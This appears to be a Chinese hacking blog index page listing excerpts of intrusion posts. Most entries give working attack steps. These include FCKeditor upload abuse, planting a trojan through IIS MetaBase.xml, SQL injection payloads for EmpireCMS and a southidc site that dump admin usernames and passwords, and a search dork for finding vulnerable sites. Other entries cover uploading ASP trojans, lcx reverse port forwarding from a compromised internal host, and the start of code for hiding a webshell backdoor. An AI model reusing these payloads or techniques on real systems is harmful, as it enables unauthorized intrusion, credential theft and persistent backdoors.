phpMyAdmin table参数SQL注入漏洞

影响版本: 
...

FCKeditor上传漏洞

晚上和宝看个台湾的站,后台套用的是FCKeditor的系统.
这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用

再入侵的时候,宝发现的心得我记录下:

http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

...

MetaBase.xml文件挂马法

MetaBase.xml文件挂马法 (1)打开MetaBase.xml文件 (2)搜索DefaultDoc关键词 (3)在DefaultDoc与DirBrowseFlags中间加入指向挂马文件所在位置的语句 例:DefaultDocFooter="file:C:\Inetpub\wwwroot\iisstart.htm" (4)在DownlevelAdminInstances=“1”下面添加语句:EnableDocFooter="True" (5)停止IIS服务,保存对MetaBase.xml文件的修改 ...

迅雷也闹“鬼”

当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码, 把我们所下载东西添加到列表当中。 所对应的htm文件有2处一处是C:\Program Files\Thunder Network\Thunder\Program\geturl.htm 一处是C:\Program Files\Thunder Network\Thunder\Program\getAllurl.htm 如果我们想把我们想要的代码添加进去执行了? 我们简单写个代码试试,代码如下: ...

Discuz! 7.0 及以下版本后台拿webshell

我先声明: 1.这个不是我首发,很多牛牛很早之前就发现了,但没人公布,ring04h牛那貌似有个:http://ring04h.googlepages.com/dzshell.txt,估计知道的人很多了,我研究的少,知道迟了,惭愧惭愧; 2.我从拿到shell的IIS日志知道这里可以利用,即styles.inc.php这个文件,于是看了下,找到利用办法。后来经flyh4t提醒,居然与ring04h的那个方法一样,我落后了... 好了,不废话,看代码: 引用: 1.

内网入侵得到3389

首先下载lcx.exe 比如放在到D盘下面。在CMD下进入到D盘,然后输入[CODE_LITE]lcx -listen 51 3389[/CODE_LITE](注意了这里51为本机的端口,3389为肉鸡上的端口)[IMG]upload/2009/6/200906271841483767.jpg[/IMG] 上面的图片开始监听端口,等待内网的3389反响连接。 打开WEBSHELL然后然后在CMD里面运行[CODE_LITE]d:\lcx -slave 211.211.21.21 3030 172.16.32.153 80 [/CODE_LITE](注意:211.211.21.21为本机的IP 172.16.32.153 为肉鸡的内网IP) ...

EmpireCMS 5.1 漏洞

帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1 然后在姓名处填: [CODE_LITE]縗\ 注意当縗\不给用时可以使用%df\替代[/CODE_LITE] 然后在联系邮箱处填[CODE_LITE],1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*[/CODE_LITE] ...

雷驰新闻发布管理系统漏洞分析

记录一下,在次感谢樱木花道指导。直接开始。先看下面的界面 [IMG]upload/2009/6/200906151155073553.jpg[/IMG] 然后先抓包分析出来uploadPic.inc.asp的路径,然后在uploadPic.inc.asp目录下输入uploadPic.asp?actionType=mod&picName=new.asp 接着开始上传张GIF格式的ASP马!上传完毕后不会返回任何信息,看下源代码里面有句 [CODE_LITE] //返回值 returnStr += "../../UploadFiles/"+document.all("imageFileName").value;[/CODE_LITE]接着就输入 ...

南方数据 注入漏洞

影响版本: v10.0 v11.0

Exploit:

http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

...

更好的隐藏webshell后门

昨天晚上奋战到2点多才拿下一个目标站!得到WEBSHELL,发现服务器上没有几个站点!而且权限还可以ASPX的话可以相互跳转目录的,为了长期运用所以打算隐藏下自己的后门,一句话、GIF图片WEBSHELL、编辑欺骗性的名字然后进行更改时间也用了!就差隐藏的方式没用了,个人认为感觉不是太好这样!今天早上上班又想弄了个根隐藏的!哈哈!看代码就知道了! [CODE_LITE] <% dim objFSO dim fdata dim objCountFile ...

«123»
控制面板
网站分类
搜索
文章归档
友情链接
最近发表
Tags列表